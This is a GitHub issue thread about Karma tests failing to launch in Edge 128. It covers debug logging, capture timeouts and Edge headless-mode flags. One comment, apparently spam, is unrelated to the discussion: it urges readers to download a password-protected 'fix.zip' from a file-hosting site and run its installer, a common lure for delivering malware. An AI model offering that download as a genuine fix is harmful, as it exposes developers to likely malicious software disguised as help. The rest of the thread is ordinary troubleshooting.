### ISSUE TITLE
Tests not starting in Edge Version 128

### ISSUE THREAD

**Issue by RenePreussler** [ChiragRupani/karma-chromiumedge-launcher#21]
The Edge Browser was updated to version 128. Now, our tests don't start anymore. the url http://localhost:9876/?id=81754414 is shown in the address bar and nothing happens. If I open a new tab and paste the url, the tests are starting.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChiragRupani** [comment]
Could you please update LogLevel in karma.conf.js to debug as below and check if you are getting logs for browser being captured:
`logLevel: config.LOG_DEBUG`

Also, please provide which OS / Version you are using. It is working fine on Win11 machine I tested.

**Comment by RenePreussler** [comment]
the problem appears on Windows 11, Edge Version 128.0.2739.42 (64 bit)
I have extracted the non working config with a dummy test
[karma-tests.zip](https://github.com/user-attachments/files/16792637/karma-tests.zip)
The problem only occurs on a machine that was provided to me by my company. If I run this project on my personal machine it is working fine.
here is the log file with LOG_DEBUG: 
[test.log](https://github.com/user-attachments/files/16792733/test.log)

**Comment by ChiragRupani** [comment]
TBH , I don't think I could help here as this is machine specific. But you can try following - 

Increase [captureTimeout](https://karma-runner.github.io/6.3/config/configuration-file.html#capturetimeout)  in `karma.conf.js` e.g. doubling it:
Clean Install all packages using [npm ci](https://docs.npmjs.com/cli/v10/commands/npm-ci)

**Comment by dgilsonAfelio** [comment]
Hello, I got the exact same issue since Yesterday (Edge update).
Edge ask for a profile in headless config too. And it break the connection

**Comment by RenePreussler** [comment]
Today my Edge browser was updated to version 128.0.2739.54. Now the problem seems to be solved.

**Comment by buddde** [comment]
I'm using Edge 128.0.2739.79. It does not start correctly in "headless mode". It shows a "choose profile dialog" instead.

It uses the following command line to start Edge:

`"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir=C:\Users\username\AppData\Local\Temp\karma-55895551 --enable-automation --no-default-browser-check --no-first-run --disable-default-apps --disable-popup-blocking --disable-background-timer-throttling --disable-renderer-backgrounding --disable-device-discovery-notifications --mute-audio http://localhost:9876/?id=55895551 --headless --no-proxy-server --remote-debugging-port=9222`

I do not know why, but if I change it manually to `--headless=new` or even `--headless=old` (instead of just `--headless`) and try to start it directly in cmd.exe, it seems to works fine.

My problem is, I do not know how to adjust my karma.conf.js to use `--headless=new` instead of `--headless`).
Any ideas?
